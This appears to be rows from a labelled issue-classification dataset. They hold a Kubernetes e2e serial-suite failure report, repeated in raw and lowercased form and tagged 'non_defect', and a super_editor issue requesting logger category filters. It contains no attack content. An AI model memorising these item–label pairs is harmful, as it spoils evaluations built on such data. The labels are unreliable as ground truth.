How to remove acne in Shenzhen [Shenzhen Hanfang Keyan (韩方科颜) national hotline 400-869-1818, 24-hour QQ 4008691818]. Shenzhen Hanfang Keyan is a professional acne-removal chain built around a secret Korean formula; Hanfang Keyan holds national cosmetics-approval status as a treatment-grade authority and acne-removal product. The chain combines the Korean formula with a professional "no-rebound" healthy acne-removal technique and an advanced "deluxe color-light" device, pioneering contract-guaranteed treatment of pimples and acne in China and successfully clearing the acne on many customers' faces.
```
-----
Original issue reported on code.google.com by `szft...@163.com` on 14 May 2014 at 7:53

Record 14,420 | id 2,811,773,298 | IssuesEvent | 2015-05-18 01:05:45
repo: itsazzad/phpsvg (https://api.github.com/repos/itsazzad/phpsvg)
action: reopened | labels: auto-migrated Priority-Medium Type-Defect
title: Wrong tmp file name while export to EPS
label: defect (binary_label: 1)
body:
```
1. Create $svg from existing SVG file
2. Try to export it to EPS under non-root user (apache, for reference)
Expected: eps file
Instead: PHP Warning: file_put_contents(/tmptmp.svg): failed to open stream:
Permission denied in /var/www/projects/mpakki/test/public/svglib/svglib.php on
line 188
I tried version 0.8 on CentOS 6.4 and php 5.4
```
Original issue reported on code.google.com by `mpa...@gmail.com` on 11 Dec 2014 at 5:55

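The `/tmptmp.svg` path in the warning above suggests the library builds its temporary path by concatenating the temp directory and the file name without a separator, so `/tmp` plus `tmp.svg` becomes `/tmptmp.svg`. That is an assumption about the phpsvg code, which is not shown in the record; a minimal Python illustration of the pattern:

```python
import os
import tempfile

tmp_dir = tempfile.gettempdir()  # typically "/tmp" on Linux

# Buggy pattern: plain string concatenation drops the directory separator,
# producing a file *next to* the temp dir instead of inside it.
bad_path = tmp_dir + "tmp.svg"

# Correct pattern: let the path library insert the separator.
good_path = os.path.join(tmp_dir, "tmp.svg")

print(bad_path)   # e.g. /tmptmp.svg, which an unprivileged user cannot create
print(good_path)  # e.g. /tmp/tmp.svg
```

The "Permission denied" in the report then follows naturally: an unprivileged user such as `apache` may not write directly under `/`.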
Record 202,354 | id 15,827,651,445 | IssuesEvent | 2021-04-06 08:57:06
repo: gatsbyjs/gatsby (https://api.github.com/repos/gatsbyjs/gatsby)
action: closed | labels: type: documentation
title: Fix code snippets on GraphQL Query Options Reference page
label: non_defect (binary_label: 0)
body:
## Summary
All code snippets on the [GraphQL Query Options Reference page](https://www.gatsbyjs.com/docs/graphql-reference/) fail to load with the error:
```
failed to get pod ip for sitehostname: graphql-reference-1124782374.gtsb.io nil
```

### Motivation
This should be fixed because GraphQL queries are central to Gatsby sites, and example code can be invaluable to those trying to learn what they need to do, or can do.
## Steps to resolve this issue
It's hard to pinpoint exactly what's needed to resolve the issue, but as a starting point I'd suggest updating the iframe src links in https://github.com/gatsbyjs/gatsby/blob/master/docs/docs/graphql-reference.md

Record 61,522 | id 17,023,714,470 | IssuesEvent | 2021-07-03 03:27:08
repo: tomhughes/trac-tickets (https://api.github.com/repos/tomhughes/trac-tickets)
action: closed | labels: Component: nominatim Priority: trivial Resolution: invalid Type: defect
title: Germany: several cities are assigned to the wrong district (e.g. "Heimsheim" is not in "Landkreis Esslingen")
label: defect (binary_label: 1)
body:
**[Submitted to the original trac issue database at 8.31pm, Thursday, 26th May 2011]**
On the OSM main search field, enter "Heimsheim" (a city in Germany). The result is:
"Verwaltungsgrenze Heimsheim, Landkreis Esslingen, Regierungsbezirk Karlsruhe, Baden-Württemberg, 71296, Deutschland"
This is wrong: Heimsheim is located in the "Enzkreis", not the "Landkreis Esslingen" (cf. Wikipedia).

Record 37,666 | id 8,474,785,542 | IssuesEvent | 2018-10-24 17:05:22
repo: brainvisa/testbidon (https://api.github.com/repos/brainvisa/testbidon)
action: closed | labels: Component: Resolution Priority: Haut Status: Closed Tracker: Defect
title: NIfTI-1 reader does not apply scaling parameters
label: defect (binary_label: 1)
body:
Author Name: **Leprince, Yann**
Original Redmine Issue: 10918, https://bioproj.extra.cea.fr/redmine/issues/10918
Original Date: 2014-08-29

When reading a NIfTI-1 file, the reader does not scale the data (slope/intercept). This changes the behaviour compared with the previous AIMS reader (scale_factor_applied = 0). As a result, the values loaded in AIMS (and thus Anatomist) do not match the values used when saving the file, leading to data corruption.

Record 383,712 | id 26,562,259,360 | IssuesEvent | 2023-01-20 16:49:33
repo: inveniosoftware/invenio (https://api.github.com/repos/inveniosoftware/invenio)
action: closed | labels: Need: documentation
title: Add doc about `Modelling data`
label: non_defect (binary_label: 0)
body:
Add documentation about modelling data:
* JSONSchema
* JSONResolver
* linking between records

Record 24,157 | id 12,036,253,910 | IssuesEvent | 2020-04-13 19:26:22
repo: badges/shields (https://api.github.com/repos/badges/shields)
action: opened | labels: service-badge
title: Crowdin badges
label: non_defect (binary_label: 0)
body:
:clipboard: **Description**
It would be a nice addition to have Crowdin's "Localized" badge (https://badges.crowdin.net/:project/localized.svg) with the customisation options of Shields.io.
:link: **Data**
There are two APIs available: the current v1 API and the v2 API (beta).
Docs v1: https://support.crowdin.com/api/api-integration-setup/
Docs v2: https://support.crowdin.com/api/v2/#section/Introduction
v1 requires an API key (generated with the project) and v2 a PAT (Personal Access Token).
:microphone: **Motivation**
Crowdin already offers a badge to display (see first link), but this badge is limited to the overall translation across all languages and can't be customised in design, nor, for example, made to cover a specific language only.

Record 361,486 | id 25,341,725,694 | IssuesEvent | 2022-11-18 22:26:10
repo: ERSP-2022-projects/ersp22-vigoda (https://api.github.com/repos/ERSP-2022-projects/ersp22-vigoda)
action: closed | labels: documentation
title: Upload relevant research papers
label: non_defect (binary_label: 0)
body:
Upload relevant research papers to README or create another folder

Record 37,801 | id 8,519,587,696 | IssuesEvent | 2018-11-01 15:04:45
repo: GoldenSoftwareLtd/gedemin (https://api.github.com/repos/GoldenSoftwareLtd/gedemin)
action: closed | labels: GedeminExe Priority-Critical Type-Defect
title: After settings are activated, the information window always hides behind all other forms
label: defect (binary_label: 1)
body:
Originally reported on Google Code with ID 3406
```
After installing settings (not PI), the information window ALWAYS hides behind all other forms.
This completely blocks any further actions. Right now each form has to be closed
separately. It should not be like this. IT DID NOT BEHAVE THIS WAY BEFORE.
```
Reported by `NikolayUkleyko` on 2014-06-20 15:00:04

Record 81,135 | id 30,723,787,635 | IssuesEvent | 2023-07-27 17:56:18
repo: SeleniumHQ/selenium (https://api.github.com/repos/SeleniumHQ/selenium)
action: closed | labels: I-defect I-question needs-triaging
title: [🐛 Bug]: In python trying to login on youtube: This browser or app may not be secure
label: defect (binary_label: 1)
body:
### What happened?
I have tried chrome, firefox, geckodriver_autoinstaller, undetected_chromedriver, and every time when the email address is filled in on youtube.com I get the message: This browser or app may not be secure.
Is this normal? Is this a bug? Or is youtube.com just not supported?
python 3.8
selenium 4.10.0
### How can we reproduce the issue?
```python
from selenium import webdriver
import geckodriver_autoinstaller
from selenium.webdriver.common.by import By
import os
import time

geckodriver_autoinstaller.install()
driver = webdriver.Firefox()

# YouTube login credentials
username = os.environ["YOUTUBE_EMAIL"]
password = os.environ["YOUTUBE_PASSWORD"]

# Open YouTube
driver.get('https://www.youtube.com/signin')

# Click on the Sign In button
# driver.find_element(By.XPATH, '//ytd-button-renderer/a/tp-yt-paper-button').click()

# Enter login credentials and submit
driver.find_element(By.ID, 'identifierId').send_keys(username)
driver.find_element(By.ID, 'identifierNext').click()
time.sleep(2)
driver.find_element(By.NAME, 'password').send_keys(password)
driver.find_element(By.ID, 'passwordNext').click()
```
### Relevant log output
```shell
not relevant.
```
### Operating System
mac os ventura 13.1
### Selenium version
4.1
### What are the browser(s) and version(s) where you see this issue?
chrome 115.0.5790.114, firefox 115.0.5790.114
### What are the browser driver(s) and version(s) where you see this issue?
115.
### Are you using Selenium Grid?
_No response_

Record 523,418 | id 15,181,544,418 | IssuesEvent | 2021-02-15 03:55:18
repo: AyeCode/invoicing (https://api.github.com/repos/AyeCode/invoicing)
action: closed | labels: For: Developer Priority: Critical Type: Bug
title: Add webhook script running on every page load.
label: non_defect (binary_label: 0)
body:
- Check if it fails; set a flag and ask for more permission (needs reconnect?)
- Can we currently read webhooks with current permissions? If so, add an admin notice stating it's missing.
- If so, show an X or a tick next to the webhook setting

Record 257,630 | id 19,526,165,650 | IssuesEvent | 2021-12-30 08:13:47
repo: dfir-iris/iris-web (https://api.github.com/repos/dfir-iris/iris-web)
action: closed | labels: documentation
title: Add screenshots and link to video in README
label: non_defect (binary_label: 0)
body:
After many requests, we should add some screenshots plus direct links to videos in the readme

Record 71,305 | id 23,531,666,003 | IssuesEvent | 2022-08-19 15:55:19
repo: networkx/networkx (https://api.github.com/repos/networkx/networkx)
action: reopened | labels: Defect
title: treewidth algos depend on node types
label: defect (binary_label: 1)
body:
The treewidth functions appear to depend on the types of nodes in the input graph.
### Current Behavior
For example, the algos fail if there is a mix of nodes with integer and string types.
### Expected Behavior
The algos should not depend on node types, only the graph structure.
### Steps to Reproduce
```python
import networkx as nx
from networkx.algorithms.approximation import treewidth

G = nx.Graph()
G.add_nodes_from([0, 'a'])
tw, td = treewidth.treewidth_min_degree(G)
# or
tw, td = treewidth.treewidth_min_fill_in(G)
```
### Environment
Python version: 3.8
NetworkX version: 2.8
### Additional context
Error:
```
File "<somedir>/lib/python3.8/site-packages/networkx/algorithms/approximation/treewidth.py", line 106, in __init__
    heapify(self._degreeq)
TypeError: '<' not supported between instances of 'int' and 'str'
```

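The traceback in the record above comes down to ordinary Python tuple comparison: the min-degree heuristic heapifies entries of the form (degree, node) (a simplified assumption about what `_degreeq` holds; the real entries may carry extra fields), and when two degrees tie, `heapq` falls back to comparing the nodes themselves, which fails for `int` versus `str`:

```python
import heapq

# Two isolated nodes, as in the bug report: both have degree 0.
entries = [(0, 0), (0, "a")]  # assumed (degree, node) pairs

try:
    heapq.heapify(entries)  # equal degrees force the comparison 0 < "a"
    failed = False
except TypeError:
    failed = True  # '<' not supported between instances of int and str

# A common fix is an insertion counter as tie-breaker, so nodes are
# never compared with each other:
unique = [(0, 0, 0), (0, 1, "a")]  # (degree, counter, node)
heapq.heapify(unique)              # no error: ties resolve on the counter
```

This tie-breaking-counter pattern is the standard workaround recommended in the `heapq` documentation for unorderable payloads.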
Record 26,500 | id 4,730,231,829 | IssuesEvent | 2016-10-18 20:59:33
repo: AsyncHttpClient/async-http-client (https://api.github.com/repos/AsyncHttpClient/async-http-client)
action: opened | labels: Defect
title: Relax the sanity check in HttpClientUpgradeHandler
label: defect (binary_label: 1)
body:
Mirror of https://github.com/netty/netty/issues/4509
Reminder to investigate and try to contribute here

Record 13,163 | id 15,590,183,061 | IssuesEvent | 2021-03-18 09:02:43
repo: CNPMNC-KDH/TKB (https://api.github.com/repos/CNPMNC-KDH/TKB)
action: reopened | labels: DuongThienKhoi NguyenThanhDuy Processing...... VuDuyVietHoang
title: Student schedule app
label: non_defect (binary_label: 0)
body:
Build a student timetable management application that helps users manage their study time better.
- [x] Finish researching the application.
- [ ] Finish reviewing interface templates.
- [ ] Agree on the interface theme.
- [ ] Build the database.
- [ ] Finish log in, sign in, forgot password.
- [ ] Finish the alarm feature.
- [ ] Finish the timetable.
- [ ] Finish building the application.
- [ ] Trial-run the application on multiple platforms.
- [ ] Test and fix bugs.
- [ ] Release the product to online app stores.

Record 510,539 | id 14,792,540,361 | IssuesEvent | 2021-01-12 14:52:23
repo: magento/magento2 (https://api.github.com/repos/magento/magento2)
action: closed | labels: CD Component: SalesRule Component: Tax Issue: Confirmed Issue: Format is valid Issue: Ready for Work Priority: P2 Progress: dev in progress Reported on 2.3.4 Reproduced on 2.4.x Severity: S2
title: Wrong tax calculation after applying discount coupon in Magento Open Source v2.3.4
body:
### Preconditions (*)
1. Fresh Magento 2.3.4, 2.4-develop (Open Source) with sample data
### Steps to reproduce (*)
1. Stores->Configuration->Sales->Tax: set all values including tax and Apply Customer Tax After Discount (http://prnt.sc/tyizqn)
2. Stores->Tax Zones and Rates: set VAT of 15% (http://prnt.sc/tyizuc)
3. Stores->Tax Rules: set VAT of 15% (http://prnt.sc/tyizwl)
4. Marketing->Cart Price Rule: set 10% off on "Percent of product price discount" (http://prnt.sc/tyizzo)
### Expected result (*)
If any taxable item's (https://prnt.sc/tyjm6f) selling price is 100 with 15% tax (13.04) included, then:
1. The base price without tax should be (100 - 13.04) = 86.96
2. A 10% discount on that base price should be (86.96 * 10%) = 8.70
3. The base price after discount should be (86.96 - 8.70) = 78.26
4. 15% tax on the new discounted base price: (78.26 * 15%) = 11.74
5. So the total price after discount, with tax: (78.26 + 11.74) = 90
### Actual result (*)
But Magento calculates the wrong tax and total after the discount:
1. It shows the base price without tax as 86.96, which is OK
2. It shows the 10% discount on that base price as 8.70, which is also OK
3. But the **tax it shows is 11.91, which is wrong**
4. And it shows the **total price after discount, with tax, as 91.30, which is also wrong**
http://prnt.sc/tyj01h
**Can anybody explain why it's working this way and what is the logic behind it?**
### Temporary solution
If we follow this fix https://github.com/magento/magento2/issues/21456#issuecomment-467475342
Fix on file `vendor/magento/module-tax/Model/Calculation/AbstractAggregateCalculator.php:49`
Replace:
```php
//TODO: handle originalDiscountAmount
$taxableAmount = max($rowTotalInclTax - $discountAmount, 0);
$rowTaxAfterDiscount = $this->calculationTool->calcTaxAmount(
    $taxableAmount,
    $rate,
    true,
    false
);
$rowTaxAfterDiscount = $this->roundAmount(
    $rowTaxAfterDiscount,
    $rate,
    true,
    self::KEY_REGULAR_DELTA_ROUNDING,
    $round,
    $item
);
// Set discount tax compensation
$discountTaxCompensationAmount = $rowTax - $rowTaxAfterDiscount;
$rowTax = $rowTaxAfterDiscount;
```
With the following:
```php
$taxableAmount = max($rowTotal - $discountAmount, 0);
$discountTaxCompensationAmount = 0;
$rowTax = $taxableAmount * ($rate / 100);
```
In our case, it works as expected (http://prnt.sc/tyj04g). Thanks to @pierzakp
**Is it reliable or safe enough to apply on the production site? Is there any alternative way or settings to fix that tax issue?**
> _Note: After applying this fix it wasn't working as expected at first; the caches had to be cleared properly, for Magento, the browser, and any third-party cache._
Replace:
```
//TODO: handle originalDiscountAmount
$taxableAmount = max($rowTotalInclTax - $discountAmount, 0);
$rowTaxAfterDiscount = $this->calculationTool->calcTaxAmount(
$taxableAmount,
$rate,
true,
false
);
$rowTaxAfterDiscount = $this->roundAmount(
$rowTaxAfterDiscount,
$rate,
true,
self::KEY_REGULAR_DELTA_ROUNDING,
$round,
$item
);
// Set discount tax compensation
$discountTaxCompensationAmount = $rowTax - $rowTaxAfterDiscount;
$rowTax = $rowTaxAfterDiscount;
```
With the following:
```
$taxableAmount = max($rowTotal - $discountAmount, 0);
$discountTaxCompensationAmount = 0;
$rowTax = $taxableAmount * ($rate / 100);
```
In our case, it works as expected (http://prnt.sc/tyj04g). Thanks to @pierzakp
**Is it reliable or safe enough to apply on the production site? Is there any alternative way or settings to fix that tax issue?**
>_Note: After applying this fix it wasn't working as expected, then find out its need clear cache properly both for Magento + Browser + 3rd party (if any)._
|
non_defect
|
wrong tax calculation after applying discount coupon in magento open source preconditions fresh magento develop open source with sample data steps to reproduce stores configuration sales tax set all values including tax and apply customer tax after discount stores tax zones and rates set vat of stores tax rules set vat of marketing cart price rule set off on percent of product price discount expected result if any taxable item s selling price and tax included then base price without tax should be as discount from that base price should be after discount base price should be tax on new discounted base price so total price after discount with tax actual result but on magento after discount it calculates wrong tax and total it shows base price without tax which is ok it shows as discount from that base price which is also ok but the tax it shows which is wrong and it shows total price after discount with tax which is also wrong can anybody explain why it s working this way and what is the logic behind it temporary solution if we follow this fix fix on file vendor magento module tax model calculation abstractaggregatecalculator php replace todo handle originaldiscountamount taxableamount max rowtotalincltax discountamount rowtaxafterdiscount this calculationtool calctaxamount taxableamount rate true false rowtaxafterdiscount this roundamount rowtaxafterdiscount rate true self key regular delta rounding round item set discount tax compensation discounttaxcompensationamount rowtax rowtaxafterdiscount rowtax rowtaxafterdiscount with the following taxableamount max rowtotal discountamount discounttaxcompensationamount rowtax taxableamount rate in our case it works as expected thanks to pierzakp is it reliable or safe enough to apply on the production site is there any alternative way or settings to fix that tax issue note after applying this fix it wasn t working as expected then find out its need clear cache properly both for magento browser party if any
| 0
|
3,310
| 13,439,947,209
|
IssuesEvent
|
2020-09-07 23:00:16
|
webanno/webanno
|
https://api.github.com/repos/webanno/webanno
|
closed
|
Importing partial Conll-u format for automation
|
Module: Automation Support request 🐛Bug
|
**Describe the bug**
I have a conll-u file with, per line, the token, the lemma, and the pos tag. I'm unable to upload this document for automation. When uploading it prints :
"Error while uploading document DOMcorpuscreole.conllu: NumberFormatException: For input string: "_""
**To Reproduce**
Steps to reproduce the behavior:
1. Go to projects
2. Create an automation project
3. Click on Documents
4. Upload Conll-u document
5. See error
**Expected behavior**
I would like to be able to import a partial conll-u file for automation, since I did POS tagging on one software and plan on doing dependencies on Webanno.
**Screenshots**

The sections per line are tab-separated (it may not look like it on Atom).
**Please complete the following information:**
- Version and build ID: [WebAnno -- 3.6.4 (2019-12-15 11:32:54, build 97e9ce7d289b6b34715e146c9e6a2782b535e43a) ]
- OS: Windows
- Browser: chrome
**Additional context**
Add any other context about the problem here.
|
1.0
|
Importing partial Conll-u format for automation - **Describe the bug**
I have a conll-u file with, per line, the token, the lemma, and the pos tag. I'm unable to upload this document for automation. When uploading it prints :
"Error while uploading document DOMcorpuscreole.conllu: NumberFormatException: For input string: "_""
**To Reproduce**
Steps to reproduce the behavior:
1. Go to projects
2. Create an automation project
3. Click on Documents
4. Upload Conll-u document
5. See error
**Expected behavior**
I would like to be able to import a partial conll-u file for automation, since I did POS tagging on one software and plan on doing dependencies on Webanno.
**Screenshots**

The sections per line are tab-separated (it may not look like it on Atom).
**Please complete the following information:**
- Version and build ID: [WebAnno -- 3.6.4 (2019-12-15 11:32:54, build 97e9ce7d289b6b34715e146c9e6a2782b535e43a) ]
- OS: Windows
- Browser: chrome
**Additional context**
Add any other context about the problem here.
|
non_defect
|
importing partial conll u format for automation describe the bug i have a conll u file with per line the token the lemma and the pos tag i m unable to upload this document for automation when uploading it prints error while uploading document domcorpuscreole conllu numberformatexception for input string to reproduce steps to reproduce the behavior go to projects create an automation project click on documents upload conll u document see error expected behavior i would like to be able to import a partial conll u file for automation since i did pos tagging on one software and plan on doing dependencies on webanno screenshots the sections per line are tab separated it may not look like it on atom please complete the following information version and build id os windows browser chrome additional context add any other context about the problem here
| 0
|
46,826
| 13,055,983,493
|
IssuesEvent
|
2020-07-30 03:18:16
|
icecube-trac/tix2
|
https://api.github.com/repos/icecube-trac/tix2
|
opened
|
offline-software trunk fails to build (Trac #1943)
|
Incomplete Migration Migrated from Trac combo core defect
|
Migrated from https://code.icecube.wisc.edu/ticket/1943
```json
{
"status": "closed",
"changetime": "2017-01-31T17:41:13",
"description": "I'm trying to build the offline-software metaproject (trunk) on my computer (Ubuntu 16.04),but the compilation fails with this error (I'll attach the full output of cmake and make to this ticket):\n{{{\ncollect2: error: ld returned 1 exit status\ndataio/CMakeFiles/dataio-shovel.dir/build.make:193: recipe for target 'bin/dataio-shovel' failed\nmake[2]: *** [bin/dataio-shovel] Error 1\nCMakeFiles/Makefile2:1877: recipe for target 'dataio/CMakeFiles/dataio-shovel.dir/all' failed\nmake[1]: *** [dataio/CMakeFiles/dataio-shovel.dir/all] Error 2\nMakefile:127: recipe for target 'all' failed\nmake: *** [all] Error 2\n}}}\n",
"reporter": "thomas.kittler",
"cc": "",
"resolution": "fixed",
"_ts": "1485884473138334",
"component": "combo core",
"summary": "offline-software trunk fails to build",
"priority": "blocker",
"keywords": "",
"time": "2017-01-27T16:41:09",
"milestone": "",
"owner": "",
"type": "defect"
}
```
|
1.0
|
offline-software trunk fails to build (Trac #1943) - Migrated from https://code.icecube.wisc.edu/ticket/1943
```json
{
"status": "closed",
"changetime": "2017-01-31T17:41:13",
"description": "I'm trying to build the offline-software metaproject (trunk) on my computer (Ubuntu 16.04),but the compilation fails with this error (I'll attach the full output of cmake and make to this ticket):\n{{{\ncollect2: error: ld returned 1 exit status\ndataio/CMakeFiles/dataio-shovel.dir/build.make:193: recipe for target 'bin/dataio-shovel' failed\nmake[2]: *** [bin/dataio-shovel] Error 1\nCMakeFiles/Makefile2:1877: recipe for target 'dataio/CMakeFiles/dataio-shovel.dir/all' failed\nmake[1]: *** [dataio/CMakeFiles/dataio-shovel.dir/all] Error 2\nMakefile:127: recipe for target 'all' failed\nmake: *** [all] Error 2\n}}}\n",
"reporter": "thomas.kittler",
"cc": "",
"resolution": "fixed",
"_ts": "1485884473138334",
"component": "combo core",
"summary": "offline-software trunk fails to build",
"priority": "blocker",
"keywords": "",
"time": "2017-01-27T16:41:09",
"milestone": "",
"owner": "",
"type": "defect"
}
```
|
defect
|
offline software trunk fails to build trac migrated from json status closed changetime description i m trying to build the offline software metaproject trunk on my computer ubuntu but the compilation fails with this error i ll attach the full output of cmake and make to this ticket n error ld returned exit status ndataio cmakefiles dataio shovel dir build make recipe for target bin dataio shovel failed nmake error ncmakefiles recipe for target dataio cmakefiles dataio shovel dir all failed nmake error nmakefile recipe for target all failed nmake error n n reporter thomas kittler cc resolution fixed ts component combo core summary offline software trunk fails to build priority blocker keywords time milestone owner type defect
| 1
|
23,058
| 3,755,593,311
|
IssuesEvent
|
2016-03-12 19:27:57
|
RomanGolovanov/aMetro
|
https://api.github.com/repos/RomanGolovanov/aMetro
|
closed
|
Display background images on the map, or replacement images (if they exist)
|
auto-migrated Component-UI Priority-Low Type-Defect
|
```
For example, Kazan, or Chile: Santiago. In the
second case the lines are not
displayed; only the image is shown
(parameter IsVector=0). The lines only
start being displayed in routes
Original issue reported on code.google.com by `G.Glaur...@gmail.com` on 30 Jan 2010 at 9:11
|
1.0
|
Display background images on the map, or replacement images (if they exist) - ```
For example, Kazan, or Chile: Santiago. In the
second case the lines are not
displayed; only the image is shown
(parameter IsVector=0). The lines only
start being displayed in routes
```
Original issue reported on code.google.com by `G.Glaur...@gmail.com` on 30 Jan 2010 at 9:11
|
defect
|
отображать на карте фоновые картинки или замещающие если они есть например казань или чили сантьяго во втором варианте линии не отображаются отображается только картинка параметр isvector линии начинают отображаться только в машрутах original issue reported on code google com by g glaur gmail com on jan at
| 1
|
29,361
| 4,494,722,763
|
IssuesEvent
|
2016-08-31 07:33:44
|
kubernetes/kubernetes
|
https://api.github.com/repos/kubernetes/kubernetes
|
opened
|
kubernetes-e2e-gce-serial: broken test run
|
kind/flake priority/P2 team/test-infra
|
https://k8s-gubernator.appspot.com/build/kubernetes-jenkins/logs/kubernetes-e2e-gce-serial/2050/
Multiple broken tests:
Failed: [k8s.io] SchedulerPredicates [Serial] validates that NodeAffinity is respected if not matching {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Issues about this test specifically: #28019
Failed: [k8s.io] SchedulerPredicates [Serial] validates that embedding the JSON PodAffinity and PodAntiAffinity setting as a string in the annotation value work {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Failed: [k8s.io] Daemon set [Serial] should run and stop complex daemon with node affinity {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Issues about this test specifically: #30441
Failed: [k8s.io] SchedulerPredicates [Serial] validates that InterPodAntiAffinity is respected if matching 2 {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Issues about this test specifically: #30078 #30142
Failed: [k8s.io] [HPA] Horizontal pod autoscaling (scale resource: CPU) [k8s.io] [Serial] [Slow] Deployment Should scale from 5 pods to 3 pods and from 3 to 1 {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Issues about this test specifically: #27406 #27669 #29770
Failed: [k8s.io] Nodes [Disruptive] [k8s.io] Network when a node becomes unreachable All pods on the unreachable node should be marked as NotReady upon the node turn NotReady AND all pods should be mark back to Ready when the node get back to Ready before pod eviction timeout {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Issues about this test specifically: #30187
Failed: [k8s.io] SchedulerPredicates [Serial] validates that InterPod Affinity and AntiAffinity is respected if matching {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Failed: [k8s.io] SchedulerPredicates [Serial] validates that InterPodAffinity is respected if matching with multiple Affinities {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Failed: [k8s.io] Namespaces [Serial] should ensure that all pods are removed when a namespace is deleted. {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Failed: [k8s.io] DaemonRestart [Disruptive] Controller Manager should not create/delete replicas across restart {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Failed: [k8s.io] DaemonRestart [Disruptive] Kubelet should not restart containers across restart {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Issues about this test specifically: #27502 #28722
Failed: [k8s.io] [HPA] Horizontal pod autoscaling (scale resource: CPU) [k8s.io] [Serial] [Slow] Deployment Should scale from 1 pod to 3 pods and from 3 to 5 {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Issues about this test specifically: #30317 #31591
Failed: [k8s.io] Nodes [Disruptive] [k8s.io] Network when a node becomes unreachable [replication controller] recreates pods scheduled on the unreachable node AND allows scheduling of pods on a node after it rejoins the cluster {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Issues about this test specifically: #27324
Failed: [k8s.io] Etcd failure [Disruptive] should recover from SIGKILL {Kubernetes e2e suite}
```
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:131
Expected error:
<*errors.errorString | 0xc82019aad0>: {
s: "timed out waiting for the condition",
}
timed out waiting for the condition
not to have occurred
/go/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/test/e2e/framework/framework.go:220
```
Issues about this test specifically: #29444
